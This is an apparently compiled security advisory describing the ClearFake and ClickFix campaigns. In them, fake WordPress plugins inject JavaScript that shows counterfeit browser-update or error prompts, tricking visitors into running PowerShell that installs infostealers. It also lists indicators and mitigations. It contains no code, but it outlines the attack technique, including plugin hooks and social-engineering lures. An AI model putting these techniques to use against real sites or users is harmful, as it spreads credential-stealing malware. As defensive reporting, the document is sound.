Introduction
WordPress websites have increasingly become targets for cyberattacks, with hackers exploiting vulnerabilities to install malicious plugins. These plugins deceive users into downloading malware that steals information. Two notable campaigns, ClearFake and ClickFix [7], have been identified [1] [3], each employing distinct tactics to compromise websites and spread malware.
Description
WordPress websites have increasingly become prime targets for hackers, who exploit vulnerabilities to install malicious plugins that deceive users into downloading information-stealing malware. Since early 2023 [4], the ClearFake initiative has been active [4], displaying counterfeit web browser update notifications on compromised sites to facilitate the spread of this malware [4]. This campaign has impacted over 6,000 sites, with attackers gaining access through stolen or purchased administrator credentials, allowing them to install seemingly legitimate plugins that mimic well-known tools like Wordfence Security, Google SEO Enhancer [2], and LiteSpeed Cache [1] [7] [9], or use generic names like “Universal Popup Plugin.” These harmful plugins [7], often bearing innocuous appearances, contain minimal files designed to evade detection by site administrators [10]. However, they inject malicious JavaScript into the websites’ HTML [3] [5] [9], loading scripts from a Binance Smart Chain (BSC) smart contract [3] [7], which ultimately display fake update banners designed to steal sensitive data or perform other malicious actions while masquerading as harmless updates [1].
In June 2024 [10], a new variant called ClickFix emerged [2], which presents fake software error alerts that offer deceptive solutions [4]. These solutions are actually PowerShell scripts that [4] [7], when executed, download and install information-stealing malware [4] [7], including remote access trojans (RATs) and infostealers like Vidar Stealer and Lumma Stealer [10]. The ClickFix campaign has been linked to the ClearFake initiative but operates differently, employing social engineering tactics to trick users into executing malicious code [3]. Attackers breach websites to display banners featuring fake error messages for popular platforms like Google Chrome [4], Google Meet [4] [7], Facebook [3] [4] [7], and captcha pages [4] [9], misleading users into downloading malware disguised as software fixes [3]. This campaign has compromised over 25,000 sites globally since August 2023, with more than 6,000 infections occurring since June 2024 [10]. The attackers primarily leverage stolen WordPress admin credentials rather than exploiting known vulnerabilities [10], as log analysis indicates no direct exploitation of the WordPress ecosystem [10]. The entire process is automated [1], underscoring the significant threat to website administrators and their users [1].
Indicators of compromise (IoCs) include the presence of .DSStore files [10], which are typically harmless but can signal a malicious plugin installation [10]. The use of valid WordPress admin credentials suggests that the hackers may have obtained these through methods such as brute-force attacks [10], phishing [6] [7] [8] [9] [10], or malware infections on the administrators’ devices [10]. Researchers have identified malicious plugins with consistent naming patterns [8], such as “Advanced User Manager” and “Quick Cache Cleaner,” which contain harmful JavaScript that injects malicious code into websites [8]. The fake plugins are systematically generated to load scripts using the wpenqueuescripts hook [8], disguising their malicious intent with the wphead hook [8]. To mitigate these risks [10], it is crucial for administrators to use strong, unique passwords [2] [7], implement multi-factor authentication [10], and for users to remain vigilant against suspicious installation messages and unexpected download prompts [2]. Website administrators are also advised to review their installed plugins and remove any that were not personally installed [7], as well as to reset admin user passwords to unique values to enhance security [7]. Organizations operating WordPress sites that have encountered reports of fake site alerts are encouraged to review their installed plugins [5]. GoDaddy has provided IoCs to help identify affected websites.
Conclusion
The ClearFake and ClickFix campaigns highlight the evolving threat landscape for WordPress websites, emphasizing the need for robust security measures. Administrators must adopt strong, unique passwords and multi-factor authentication to safeguard against unauthorized access. Regular reviews of installed plugins and vigilance against suspicious activities are crucial. As cyber threats continue to evolve, proactive measures and awareness are essential to protect websites and their users from potential compromises.
References
[1] https://www.techradar.com/pro/security/thousands-of-wordpress-websites-hacked-via-plugin-that-looks-to-steal-user-data
[2] https://www.pcworld.com/article/2497450/hackers-infect-thousands-of-wordpress-sites-with-malware-plugins.html
[3] https://www.bitdefender.com/en-gb/blog/hotforsecurity/cybercriminals-hijack-over-6-000-wordpress-sites-to-distribute-malware/
[4] https://www.isss.org.uk/news/over-6000-wordpress-hacked-to-install-plugins-pushing-infostealers/
[5] https://insight.scmagazineuk.com/thousands-of-wordpress-sites-compromised-with-malicious-plugins
[6] https://www.darkreading.com/endpoint-security/swarms-fake-wordpress-plug-ins-infect-sites-infostealers
[7] https://nsaneforums.com/news/security-privacy-news/over-6000-wordpress-hacked-to-install-plugins-pushing-infostealers-r26117/
[8] https://cyberpress.org/clickfix-malware-infects-visitors-through-hacked/
[9] https://intruceptlabs.com/2024/10/advisory-int-ia-009/
[10] https://thecyberexpress.com/fake-wordpress-plugins-malware/